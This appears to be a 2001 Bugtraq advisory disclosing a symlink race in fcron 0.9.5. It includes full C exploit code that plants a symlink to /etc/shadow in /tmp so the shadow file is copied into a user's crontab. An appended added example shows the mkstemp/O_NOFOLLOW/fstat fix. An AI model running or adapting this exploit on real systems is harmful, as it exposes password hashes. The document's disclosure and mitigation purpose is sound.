Bugtraq mailing list archives
fcron 0.9.5 is vulnerable to a symlink attack
From: kiss from Helisec <NIKEBOY () RETEMAIL ES>
Date: Wed, 28 Feb 2001 21:30:18 +0100
What we need: we need that root updates our crontab file (# fcrontab -u kiss -e).

What we get: we get /etc/shadow written into our crontab file (or any other file we want).

This is just a proof of concept. What we have to do is run the exploit above from a normal user shell. Then, in a root console, we update that user's crontab. After that, just check the contents of <user>.orig and you'll find /etc/shadow right there :-).

/* --------------------------
   fcrontab exploit by _kiss_
   -------------------------- */

#include <stdio.h>
#include <stdlib.h>      /* system() */
#include <string.h>      /* strncmp(), strcpy(), strcat() */
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>
#include <dirent.h>

#define TRUE 1

int main(void)
{
    struct stat buf;
    time_t modif1, modif2;
    DIR *dir;
    struct dirent *direntry;
    int found = 0;
    char string[200];
    char string2[200];

    printf("---------------------------------------------\n");
    printf(" fcrontab exploit by _kiss_\n");
    printf(" Helios Security and Administration (HeliSec)\n\n");
    printf(" Greets: Jet-Li (for teaching me some lessons of shell\n");
    printf(" that i will need someday) :D\n");
    printf("---------------------------------------------\n");

    /* we wait till /tmp/fcrontab is created */
    printf("\nwaiting for /tmp/fcrontab to be created...\n");
    while (!found) {
        dir = opendir("/tmp");
        while ((direntry = readdir(dir)) != NULL) {
            if (strncmp("fcrontab", direntry->d_name, 8) == 0) {
                found = 1;
                /* copy the name now: the dirent belongs to the DIR
                   stream and is gone after closedir() */
                strcpy(string, "/tmp/");
                strcat(string, direntry->d_name);
                break;
            }
        }
        closedir(dir);
    }

    while (TRUE) {
        if (stat(string, &buf) != -1)
            break;
    }

    /* we store date of last modification */
    printf("/tmp/fcrontab created. waiting for the update...\n");
    modif1 = buf.st_mtime;

    /* we wait till /tmp/fcrontab is updated */
    do {
        stat(string, &buf);
        modif2 = buf.st_mtime;
    } while (modif1 == modif2);

    /* we make the symlink */
    printf("making a symlink to /etc/shadow...\n");
    strcpy(string2, "ln -fs /etc/shadow ");
    strcat(string2, string);
    system(string2);

    /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
    printf("... now check /var/spool/fcron/kiss.orig\n");
    return 0;
}

NOTE: a new version has been released to correct this bug (1.0.1), and it can be found at fcron.free.fr

_kiss_ from HeliSec
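The root cause the post relies on is a privileged program that uses a predictable name in world-writable /tmp and then re-opens that name, so whatever is there at the moment of the re-open (including a symlink planted in the window between "created" and "updated") gets followed. The following C program is an added example, not code from the post and not fcron's own fix in 1.0.1: it shows the two controls that close that window, an unpredictable name created with O_EXCL semantics (mkstemp) and a re-open with O_NOFOLLOW followed by an fstat check on the descriptor actually obtained. The template /tmp/fcrontab.XXXXXX, the function names create_scratch, reopen_verified and demo_symlink_rejected, and the self-check that swaps the scratch file for a symlink to a second harmless scratch file are all constructed for this example; it assumes a POSIX system with a writable /tmp.

```c
/* Added example (not fcron's code, not from the original post): how a
 * privileged program can use a scratch file in /tmp without following an
 * attacker-planted symlink. Assumes a POSIX system with a writable /tmp. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Create a scratch file under an unpredictable name. mkstemp() opens with
 * O_CREAT|O_EXCL, so a name an attacker pre-planted (file or symlink) is
 * never reused. Fills 'path' with the name chosen; returns the fd or -1. */
int create_scratch(char *path, size_t pathlen)
{
    if (pathlen < sizeof "/tmp/fcrontab.XXXXXX")
        return -1;
    strcpy(path, "/tmp/fcrontab.XXXXXX");   /* constructed template */
    return mkstemp(path);
}

/* Re-open 'path' for writing without following symlinks, then check that
 * the object actually opened is a regular file we own with a single link.
 * Returns the fd, or -1 with errno set (ELOOP when 'path' is a symlink). */
int reopen_verified(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check replaying the race from the post: after the scratch file
 * exists, replace it with a symlink (here pointing at a second harmless
 * scratch file standing in for /etc/shadow) and confirm reopen_verified()
 * refuses it. Returns 1 if the honest file was accepted and the symlink
 * rejected with ELOOP, 0 otherwise. */
int demo_symlink_rejected(void)
{
    char victim[64] = "", path[64] = "";
    int vfd = -1, fd = -1, r = -1, ok = 0;

    vfd = create_scratch(victim, sizeof victim);
    fd = create_scratch(path, sizeof path);
    if (vfd < 0 || fd < 0)
        goto out;
    close(fd);
    fd = -1;

    /* honest case: the regular file we created is accepted */
    r = reopen_verified(path);
    if (r < 0)
        goto out;
    close(r);

    /* the swap from the post ("ln -fs <target> /tmp/fcrontab..."),
     * done here against a harmless constructed file */
    if (unlink(path) < 0 || symlink(victim, path) < 0)
        goto out;

    /* the defence: O_NOFOLLOW makes open() fail, nothing reaches 'victim' */
    r = reopen_verified(path);
    ok = (r < 0 && errno == ELOOP);
    if (r >= 0)
        close(r);

out:
    if (fd >= 0)
        close(fd);
    if (vfd >= 0)
        close(vfd);
    unlink(path);    /* removes the symlink or the file, whichever is there */
    unlink(victim);
    return ok;
}

int main(void)
{
    printf("symlink rejected: %s\n", demo_symlink_rejected() ? "yes" : "no");
    return 0;
}
```

The fstat check matters as much as O_NOFOLLOW: O_NOFOLLOW only refuses a symlink at the final path component, so a privileged program should also confirm ownership and link count on the descriptor it got, and should do so on the fd rather than via a second stat() on the path, which would reintroduce the same check-then-use window the post exploits.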